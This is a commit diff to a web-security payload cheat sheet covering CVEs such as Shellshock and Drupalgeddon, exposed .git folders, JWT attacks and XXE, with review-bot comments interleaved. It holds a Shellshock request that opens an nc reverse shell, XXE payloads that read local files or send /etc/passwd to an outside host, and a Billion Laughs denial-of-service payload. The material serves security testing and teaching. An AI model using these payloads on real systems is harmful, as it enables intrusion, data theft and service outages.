Attack details + Summary JWT + XXE adjustments

Swissky 2018-11-26 00:25:06 +01:00
parent 928a454531
commit 521d61d956
4 changed files with 47 additions and 11 deletions

@ -1,16 +1,29 @@
# Common Vulnerabilities and Exposures # Common Vulnerabilities and Exposures
Big CVEs in the last 5 years. Big CVEs in the last 5 years.
## CVE-2014-0160 - Heartbleed ## CVE-2014-0160 - Heartbleed
The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs). The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs).
## CVE-2014-6271 - Shellshock ## CVE-2014-6271 - Shellshock
Shellshock, also known as Bashdoor is a family of security bug in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system. Shellshock, also known as Bashdoor is a family of security bug in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.
```bash
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.0.XX 4444 -e /bin/sh\r\n
```
## CVE-2017-5638 - Apache Struts 2 ## CVE-2017-5638 - Apache Struts 2
On March 6th, a new remote code execution (RCE) vulnerability in Apache Struts 2 was made public. This recent vulnerability, CVE-2017-5638, allows a remote attacker to inject operating system commands into a web application through the “Content-Type” header. On March 6th, a new remote code execution (RCE) vulnerability in Apache Struts 2 was made public. This recent vulnerability, CVE-2017-5638, allows a remote attacker to inject operating system commands into a web application through the “Content-Type” header.
## CVE-2018-7600 - Drupalgeddon 2
A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised.
## Thanks to ## Thanks to
* http://heartbleed.com
* https://en.wikipedia.org/wiki/Shellshock_(software_bug) * [Heartbleed - Official website](http://heartbleed.com)
* [Shellshock - Wikipedia](https://en.wikipedia.org/wiki/Shellshock_(software_bug))
* [Imperva Apache Struts analysis](https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/) * [Imperva Apache Struts analysis](https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/)
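Review bot: the Shellshock example on the `echo -e "HEAD /cgi-bin/status ...` line is not valid shell as written: the double-quoted string is never closed, so the snippet cannot be pasted into a terminal; either close the quote or label the line as a request fragment rather than a command. The new `## CVE-2018-7600 - Drupalgeddon 2` section is also the only CVE on the page without an entry under `## Thanks to`; add the advisory it was written from, and naming the fixed Drupal releases next to "Drupal 7.x and 8.x" would let a reader check whether a given deployment is still affected.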

@ -16,10 +16,16 @@
The following examples will create either a copy of the .git or a copy of the current commit. The following examples will create either a copy of the .git or a copy of the current commit.
Check for the following files, if they exist you can extract the .git folder.
- .git/config
- .git/HEAD
- .git/logs/HEAD
### Github example with a .git ### Github example with a .git
1. Check 403 error (Forbidden) for .git or even better : directory listing 1. Check 403 error (Forbidden) for .git or even better : a directory listing
2. Git saves all informations in log file .git/logs/HEAD (try 'head' too) 2. Git saves all informations in log file .git/logs/HEAD (try 'head' in lowercase too)
```powershell ```powershell
0000000000000000000000000000000000000000 15ca375e54f056a576905b41a417b413c57df6eb root <root@dfc2eabdf236.(none)> 1455532500 +0000 clone: from https://github.com/fermayo/hello-world-lamp.git 0000000000000000000000000000000000000000 15ca375e54f056a576905b41a417b413c57df6eb root <root@dfc2eabdf236.(none)> 1455532500 +0000 clone: from https://github.com/fermayo/hello-world-lamp.git
15ca375e54f056a576905b41a417b413c57df6eb 26e35470d38c4d6815bc4426a862d5399f04865c Michael <michael@easyctf.com> 1489390329 +0000 commit: Initial. 15ca375e54f056a576905b41a417b413c57df6eb 26e35470d38c4d6815bc4426a862d5399f04865c Michael <michael@easyctf.com> 1489390329 +0000 commit: Initial.
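Review bot: the new checklist (`.git/config`, `.git/HEAD`, `.git/logs/HEAD`) tells the reader how to recognise an exposed repository but not what to do about it; one sentence on the fix belongs here, i.e. deny access to `.git/` in the web server configuration and keep the repository out of the deployed document root. Smaller points in the same hunk: "Git saves all informations" should read "all information", and the fence around the reflog excerpt is tagged `powershell` although the content is a git log, so `text` would be the accurate tag.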

@ -2,6 +2,11 @@
> JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object. This information can be verified and trusted because it is digitally signed. > JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object. This information can be verified and trusted because it is digitally signed.
- JWT Format
- JWT Signature - None algorithm
- JWT Signature - RS256 to HS256
- Breaking JWT's secret
## JWT Format ## JWT Format
JSON Web Token : `Base64(Header).Base64(Data).Base64(Signature)` JSON Web Token : `Base64(Header).Base64(Data).Base64(Signature)`
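Review bot: the four summary items added under the RFC 7519 blockquote are plain text rather than links, so they do not work as a table of contents; write them as anchor links to the existing headings, e.g. `- [JWT Format](#jwt-format)`, and keep each item's wording identical to its heading so the anchors resolve.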
@ -139,3 +144,4 @@ eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret
- [5 Easy Steps to Understanding JSON Web Token](https://medium.com/vandium-software/5-easy-steps-to-understanding-json-web-tokens-jwt-1164c0adfcec) - [5 Easy Steps to Understanding JSON Web Token](https://medium.com/vandium-software/5-easy-steps-to-understanding-json-web-tokens-jwt-1164c0adfcec)
- [Hacking JSON Web Tokens - From Zero To Hero Without Effort - Websecurify Blog](https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html) - [Hacking JSON Web Tokens - From Zero To Hero Without Effort - Websecurify Blog](https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html)
- [HITBGSEC CTF 2017 - Pasty (Web) - amon (j.heng)](https://nandynarwhals.org/hitbgsec2017-pasty/) - [HITBGSEC CTF 2017 - Pasty (Web) - amon (j.heng)](https://nandynarwhals.org/hitbgsec2017-pasty/)
- [Critical vulnerabilities in JSON Web Token libraries - March 31, 2015 - Tim McLean](https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries//)
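Review bot: the new reference URL ends with a doubled slash (`...json-web-token-libraries//`); drop the extra one so the link matches the style of the other entries. The article it points to is the original write-up of the `none` algorithm and RS256-to-HS256 confusion issues now listed in the summary, so it would also be worth citing it directly from those two sections rather than only from the reference list.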

@ -1,10 +1,11 @@
# XML External Entity # XML External Entity
An XML External Entity attack is a type of attack against an application that parses XML input An XML External Entity attack is a type of attack against an application that parses XML input and allows XML entities.
XML entities can be used to tell the XML parser to fetch specific content on the server.
## Exploit ## Exploit
Basic Test Basic XML external entity test, the result should contain "John" in `firstName` and "Doe" in `lastName`.
```xml ```xml
<!--?xml version="1.0" ?--> <!--?xml version="1.0" ?-->
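Review bot: "parses XML input and allows XML entities" and "fetch specific content on the server" are imprecise: internal entities are harmless, the issue is a parser that resolves external entities (`<!ENTITY ... SYSTEM "...">`) declared in a DTD, and what gets fetched can be a local file or a remote URL, as the `/etc/passwd` and `php://filter` examples further down show. Suggest: "... that parses XML input and resolves external entities. An external entity lets the document instruct the parser to read a local file or a remote URL", followed by the one-line mitigation a reader fixing this needs (disable DTD processing or external entity resolution in the parser). "Basic XML external entity test, the result should contain ..." is a comma splice; split it or use a colon.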
@ -67,14 +68,16 @@ Classic XXE Base64 encoded
<?xml version="1.0" encoding="ISO-8859-1"?> <?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!DOCTYPE foo [
<!ELEMENT foo ANY > <!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "php://filter/convert.bae64-encode/resource=http://10.0.0.3" > <!ENTITY % xxe SYSTEM "php://filter/convert.base64-encode/resource=http://10.0.0.3" >
]> ]>
<foo>&xxe;</foo> <foo>&xxe;</foo>
``` ```
## Deny of service ## Deny of service
Deny Of Service - Billion Laugh Attack **Warning** : These attacks will disable the service or the server, do not use them on the Prod.
Billion Laugh Attack
```xml ```xml
<!DOCTYPE data [ <!DOCTYPE data [
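Review bot: "Deny of service" should be "Denial of service", "Billion Laugh Attack" should be "Billion Laughs attack" (the name the technique is known by), and "do not use them on the Prod" reads better as "do not run them against production". The added warning is useful; it would help readers responsible for a service more if it also said what stops this class of payload, namely entity expansion limits or disabling DTDs in the parser. The `bae64` to `base64` correction in the `php://filter` entity is right.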
@ -103,8 +106,12 @@ i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
## Blind XXE - Out of Band ## Blind XXE - Out of Band
Sometimes you won't have a result outputted in the page but you can still extract the data with an out of band attack.
### Blind XXE ### Blind XXE
Send the content of `/etc/passwd` to "www.malicious.com", you may receive only the first line.
```xml ```xml
<?xml version="1.0" encoding="ISO-8859-1"?> <?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!DOCTYPE foo [
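Review bot: "a result outputted in the page" should read "a result displayed in the page". The new sentence "Send the content of `/etc/passwd` to "www.malicious.com", you may receive only the first line" is a comma splice and leaves the reader guessing why only one line arrives: the file content is embedded in a URL, so a newline or any other URL-invalid character ends or aborts the request. Also use a reserved documentation name (an `.example` domain per RFC 2606) in place of `www.malicious.com`, which may belong to someone.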
@ -146,13 +153,17 @@ File stored on http://127.0.0.1/dtd.xml
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://127.0.0.1/dtd.xml?%data;'>"> <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://127.0.0.1/dtd.xml?%data;'>">
``` ```
### XXE Inside SOAP ### XXE inside SOAP
```xml ```xml
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body> <soap:Body>
<foo>
<![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]>
</foo>
</soap:Body>
``` ```
### XXE Inside DOCX file ### XXE inside DOCX file
Format of an Open XML file (inject the payload in any .xml file): Format of an Open XML file (inject the payload in any .xml file):
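Review bot: the reflowed `<soap:Body>` snippet is still a fragment: no enclosing `<soap:Envelope>` declares the `soap` prefix, so it is not well-formed XML on its own; say so in a lead sentence ("body of a SOAP request, envelope omitted") or include the envelope. The DOCTYPE sits inside a `<![CDATA[...]]>` section, i.e. it arrives as element text and only matters if the receiving code later re-parses that string as XML; one sentence stating that would tell readers when the example applies and that not re-parsing untrusted strings is the fix. The capitalization change to "XXE inside SOAP" now matches the "XXE inside DOCX file" heading, which is good.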